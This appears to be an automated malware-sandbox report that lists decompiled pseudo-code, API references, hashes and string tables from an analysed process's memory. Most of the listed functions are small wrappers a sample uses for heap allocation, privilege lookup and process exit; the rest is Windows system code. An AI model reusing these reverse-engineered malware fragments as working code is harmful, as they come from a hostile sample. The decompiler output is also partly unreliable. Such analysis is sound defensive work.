0x0041862c
0x0041863a
0x00418650
0x00418654
0x004185cc
0x004185cc
0x004185d3
0x004185e2
0x004185e2
0x004185ea
0x00418610
0x00418610

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650

Memory Dump Source

Source File: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 523f04cf20efcbd1058fc3a850bd682b4f999cab60ab9b5f267057c9cb8b6952
Instruction ID: f0b9f8bfa91d960491807779a90083a4481057f790e0b16a3b5f2a921d8b85dd
Opcode Fuzzy Hash: 523f04cf20efcbd1058fc3a850bd682b4f999cab60ab9b5f267057c9cb8b6952
Instruction Fuzzy Hash: 57E09AB16452506BCB21DF299C45ED73B28AF83210F04808AFA885B282C834A824C7F8

Uniqueness

Uniqueness Score: -1.00%

Function 004184C0, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004184C0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E00418DB0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x004184cf
0x004184d7
0x004184ed
0x004184f1

APIs

RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED

Memory Dump Source

Source File: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: bd69bb0d8e56be58ea846d441575552e1355d89f45fa104c15060bc9e05e818a
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: EDE01AB12002046BDB14DF59DC45EE777ACAF88750F014559BA0857241CA30E9108AF4

Uniqueness

Uniqueness Score: -1.00%

Function 00418480, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418480(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E00418DB0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x00418497
0x004184ad
0x004184b1

APIs

RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD

Memory Dump Source

Source File: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 95874ba5a5537b3d16e5bdcad340c4ef7a657c48911e570d945e23b5f838c0ed
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 7BE012B1200208ABDB14EF99DC41EE777ACAF88654F118559BA085B282CA30F9108AF4

Uniqueness

Uniqueness Score: -1.00%

Function 0041861C, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0041861C(void* __eax, intOrPtr* _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				intOrPtr* _t8;
				int _t11;
				intOrPtr _t12;
				void* _t16;

				_t8 = _a4;
				_t12 =  *((intOrPtr*)(_t8 + 0xa18));
				asm("sbb [edx], cl");
				 *_t8 =  *_t8 + _t8;
				E00418DB0(_t16, _t8, _t8 + 0xc8c, _t12, 0, 0x46);
				_t11 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t11;
			}

0x00418623
0x00418626
0x00418628
0x0041862a
0x0041863a
0x00418650
0x00418654

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650

Memory Dump Source

Source File: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 0c710dff49ace5dd85d7782df860aea3053557ab59e4557cb382e6ef21c7c041
Instruction ID: 365271f8af807b489c65f00fbc01140156c73c489d695ccda8bbc4973ecadc89
Opcode Fuzzy Hash: 0c710dff49ace5dd85d7782df860aea3053557ab59e4557cb382e6ef21c7c041
Instruction Fuzzy Hash: 41E01AB16002186BDB10DF85DC85EEB37A9AF89650F118559FA09AB241CA34E9108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418620, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00418620(intOrPtr* _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				intOrPtr* _t7;
				int _t10;
				intOrPtr _t11;
				void* _t15;

				_t7 = _a4;
				_t11 =  *((intOrPtr*)(_t7 + 0xa18));
				asm("sbb [edx], cl");
				 *_t7 =  *_t7 + _t7;
				E00418DB0(_t15, _t7, _t7 + 0xc8c, _t11, 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x00418623
0x00418626
0x00418628
0x0041862a
0x0041863a
0x00418650
0x00418654

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650

Memory Dump Source

Source File: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 1821f594b7a2fedb3326d3670d224aab122327744fc2f581a2e4424e2d02315d
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 2AE01AB12002086BDB10DF49DC85EE737ADAF89650F018159BA0857241C934E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 004184F3, Relevance: 1.5, APIs: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E004184F3(intOrPtr _a4, int _a8) {
				void* _t23;

				asm("cmc");
				asm("out 0x66, eax");
				_t11 = _a4;
				E00418DB0(_t23, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t11 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x004184f5
0x004184f8
0x00418503
0x0041851a
0x00418528

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528

Memory Dump Source

Source File: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: f568f8f9198ae40d9e1187bb6f8462a45598cc8a6b4c3904ba6faafd6a9ceca2
Instruction ID: 19fa9fc9d31237ab9c762a526bad3dd699b139ec7d7001aa30dae1af17590834
Opcode Fuzzy Hash: f568f8f9198ae40d9e1187bb6f8462a45598cc8a6b4c3904ba6faafd6a9ceca2
Instruction Fuzzy Hash: 78E0C2B8A452412ACF119B348CD5EC33FA4DF85305F1449AEAD9AAB243C974E606C6A4

Uniqueness

Uniqueness Score: -1.00%

Function 00418500, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418500(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E00418DB0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x00418503
0x0041851a
0x00418528

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528

Memory Dump Source

Source File: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 9f62bdc44f65d7d9a2483e28fb075f3ff631dd5cfbab79109080827007e6cc43
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 62D012716003147BD620DF99DC85FD7779CDF49750F018069BA1C5B241C931BA0086E5

Uniqueness

Uniqueness Score: -1.00%

Function 017F967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 017F9694

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6ac3ade02f3fb931aaf3d8585ec8c9e8a9d1b4b87920837e46563a69abda5623
Instruction ID: 9e7ee52535696e215f35feeadd9b116418b19e0bdb4a0ebcabc2c320c5a070e4
Opcode Fuzzy Hash: 6ac3ade02f3fb931aaf3d8585ec8c9e8a9d1b4b87920837e46563a69abda5623
Instruction Fuzzy Hash: 99B02B718010C4C5D602D3E00A08717BA007BC0300F12C011E3020350B8378C080F1B1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0186B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0186B484
a NULL pointer, xrefs: 0186B4E0
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0186B3D6
write to, xrefs: 0186B4A6
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0186B2DC
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0186B476
*** Resource timeout (%p) in %ws:%s, xrefs: 0186B352
*** enter .exr %p for the exception record, xrefs: 0186B4F1
The instruction at %p referenced memory at %p., xrefs: 0186B432
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0186B53F
Go determine why that thread has not released the critical section., xrefs: 0186B3C5
*** A stack buffer overrun occurred in %ws:%s, xrefs: 0186B2F3
The instruction at %p tried to %s , xrefs: 0186B4B6
The resource is owned exclusively by thread %p, xrefs: 0186B374
The critical section is owned by thread %p., xrefs: 0186B3B9
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0186B323
*** Inpage error in %ws:%s, xrefs: 0186B418
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 0186B39B
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0186B305
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0186B314
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0186B38F
read from, xrefs: 0186B4AD, 0186B4B2
*** An Access Violation occurred in %ws:%s, xrefs: 0186B48F
an invalid address, %p, xrefs: 0186B4CF
*** then kb to get the faulting stack, xrefs: 0186B51C
The resource is owned shared by %d threads, xrefs: 0186B37E
<unknown>, xrefs: 0186B27E, 0186B2D1, 0186B350, 0186B399, 0186B417, 0186B48E
*** enter .cxr %p for the context, xrefs: 0186B50D
This failed because of error %Ix., xrefs: 0186B446
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0186B47D

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 846527bda45371e738e0f21d3cb8078573a70c593b44450199543f5efe2f6397
Instruction ID: c91575b8f9fb21429d81f43f3b6998e677019f20a6a5406aad2e712c6c4b3e2b
Opcode Fuzzy Hash: 846527bda45371e738e0f21d3cb8078573a70c593b44450199543f5efe2f6397
Instruction Fuzzy Hash: 588156B1B00204FFDB319A4ADC95DBF7B69EF96759F800158F604EB112D6608741CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 01871C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01871C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x17948a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E017BB150();
				} else {
					E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x18a589c);
				E017BB150("Heap error detected at %p (heap handle %p)\n",  *0x18a58a0);
				_t27 =  *0x18a5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01871E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E017BB150();
				} else {
					E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E017BB150("Error code: %d - %s\n",  *0x18a5898);
				_t113 =  *0x18a58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E017BB150();
					} else {
						E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E017BB150("Parameter1: %p\n",  *0x18a58a4);
				}
				_t115 =  *0x18a58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E017BB150();
					} else {
						E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E017BB150("Parameter2: %p\n",  *0x18a58a8);
				}
				_t117 =  *0x18a58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E017BB150();
					} else {
						E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E017BB150("Parameter3: %p\n",  *0x18a58ac);
				}
				_t119 =  *0x18a58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E017BB150();
					} else {
						E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x18a58b4);
					E017BB150("Last known valid blocks: before - %p, after - %p\n",  *0x18a58b0);
				} else {
					_t120 =  *0x18a58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E017BB150();
				} else {
					E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E017BB150("Stack trace available at %p\n", 0x18a58c0);
			}

0x01871c10
0x01871c16
0x01871c1e
0x01871c3d
0x01871c3e
0x01871c20
0x01871c35
0x01871c3a
0x01871c44
0x01871c55
0x01871c5a
0x01871c65
0x01871c67
0x00000000
0x01871c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01871c67
0x01871cdc
0x01871ce5
0x01871d04
0x01871d05
0x01871ce7
0x01871cfc
0x01871d01
0x01871d0b
0x01871d17
0x01871d1f
0x01871d25
0x01871d30
0x01871d4f
0x01871d50
0x01871d32
0x01871d47
0x01871d4c
0x01871d61
0x01871d67
0x01871d68
0x01871d6e
0x01871d79
0x01871d98
0x01871d99
0x01871d7b
0x01871d90
0x01871d95
0x01871daa
0x01871db0
0x01871db1
0x01871db7
0x01871dc2
0x01871de1
0x01871de2
0x01871dc4
0x01871dd9
0x01871dde
0x01871df3
0x01871df9
0x01871dfa
0x01871e00
0x01871e0a
0x01871e13
0x01871e32
0x01871e33
0x01871e15
0x01871e2a
0x01871e2f
0x01871e39
0x01871e4a
0x01871e02
0x01871e02
0x01871e08
0x00000000
0x00000000
0x01871e08
0x01871e5b
0x01871e7a
0x01871e7b
0x01871e5d
0x01871e72
0x01871e77
0x01871e95

Strings

heap_failure_invalid_allocation_type, xrefs: 01871CB4
heap_failure_usage_after_free, xrefs: 01871CBB
heap_failure_invalid_argument, xrefs: 01871CAD
heap_failure_block_not_busy, xrefs: 01871CA6
heap_failure_virtual_block_corruption, xrefs: 01871C91
Parameter2: %p, xrefs: 01871DA5
heap_failure_entry_corruption, xrefs: 01871C83
heap_failure_cross_heap_operation, xrefs: 01871CC2
heap_failure_lfh_bitmap_mismatch, xrefs: 01871CD7
heap_failure_unknown, xrefs: 01871C75
heap_failure_buffer_overrun, xrefs: 01871C98
Parameter1: %p, xrefs: 01871D5C
HEAP[%wZ]: , xrefs: 01871C30, 01871CF7, 01871D42, 01871D8B, 01871DD4, 01871E25, 01871E6D
Parameter3: %p, xrefs: 01871DEE
heap_failure_internal, xrefs: 01871C6E
HEAP: , xrefs: 01871C16, 01871C3D, 01871D04, 01871D4F, 01871D98, 01871DE1, 01871E32, 01871E7A
Last known valid blocks: before - %p, after - %p, xrefs: 01871E45
heap_failure_generic, xrefs: 01871C7C
heap_failure_freelists_corruption, xrefs: 01871CC9
Heap error detected at %p (heap handle %p), xrefs: 01871C50
heap_failure_buffer_underrun, xrefs: 01871C9F
Stack trace available at %p, xrefs: 01871E86
heap_failure_multiple_entries_corruption, xrefs: 01871C8A
heap_failure_listentry_corruption, xrefs: 01871CD0
Error code: %d - %s, xrefs: 01871D12

Memory Dump Source

Source File: 0000000B.00000002.804000123.0000000001790000.00000040.00000001.sdmp, Offset: 01790000, based on PE: true

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 87edececd02c91c3980d13aac3944e6d1d8ca9d7e4e4e3bd3a541ed8d3c5f9aa
Instruction ID: 93a618daeb3c70b22edd3d28f1908a0f68b43e2451dec82cf416f24f681170a8
Opcode Fuzzy Hash: 87edececd02c91c3980d13aac3944e6d1d8ca9d7e4e4e3bd3a541ed8d3c5f9aa
Instruction Fuzzy Hash: 5861F933529149DFD721AB89D4DDE25F7A8E744B30749813EF9099BB01DB24DE808F4A

Uniqueness

Uniqueness Score: -1.00%

Function 017C3D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E017C3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E017C1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E017C1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E017C1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E017C1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E017C1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L017D4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E017FF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01801370(_t276, 0x1794e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E017FBB40(0,  &_v68, _t170);
									if(L017C43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E017FBB40(_t257,  &_v68, _t243);
								if(L017C43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01801370(_t278, 0x1794e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L017D4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E017FF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01801370(_v16, 0x1794e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E017FBB40(_t262,  &_v68, _t244);
								if(L017C43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01801370(_t282, 0x1794e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E017FBB40(_t262,  &_v68, _t201);
							if(L017C43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L017D4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E017FF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01801370(_t280, 0x1794e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E017FBB40(_t267,  &_v68, _t245);
							if(L017C43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01801370(_t284, 0x1794e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E017FBB40(_t267,  &_v68, _t224);
						if(L017C43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L017D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x017c3d3c
0x017c3d42
0x017c3d44
0x017c3d46
0x017c3d49
0x017c3d4c
0x017c3d4f
0x017c3d52
0x017c3d55
0x017c3d58
0x017c3d5b
0x017c3d5f
0x017c3d61
0x017c3d66
0x01818213
0x01818218
0x017c4085
0x017c4088
0x017c408e
0x017c4094
0x017c409a
0x017c40a0
0x017c40a6
0x017c40a9
0x017c40af
0x017c40b6
0x017c40bd
0x017c40bd
0x017c3d83
0x0181821f
